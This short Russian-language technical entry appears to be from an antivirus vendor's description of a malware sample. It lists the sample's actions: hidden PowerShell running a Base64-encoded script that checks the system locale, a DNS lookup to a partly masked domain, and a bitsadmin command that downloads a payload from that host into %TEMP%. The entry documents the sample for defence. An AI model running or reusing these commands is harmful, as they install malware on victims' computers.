Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'aWYoKChHZXQtVUlDdWx0dXJlKS5OYW1lIC1tYXRjaCAiQ058Uk98UlV8VUF8QlkiKSAtb3IgKChHZXQtV21pT2JqZWN0IC1jbGFzcyB...
- DNS ASK ho##.tith.in
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'aWYoKChHZXQtVUlDdWx0dXJlKS5OYW1lIC1tYXRjaCAiQ058Uk98UlV8VUF8QlkiKSAtb3IgKChHZXQtV21pT2JqZWN0IC1jbGFzcyB...' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer sijcihj http://ho##.tith.in/seven.sat?fw#### %TEMP%\ePowerTray32.exe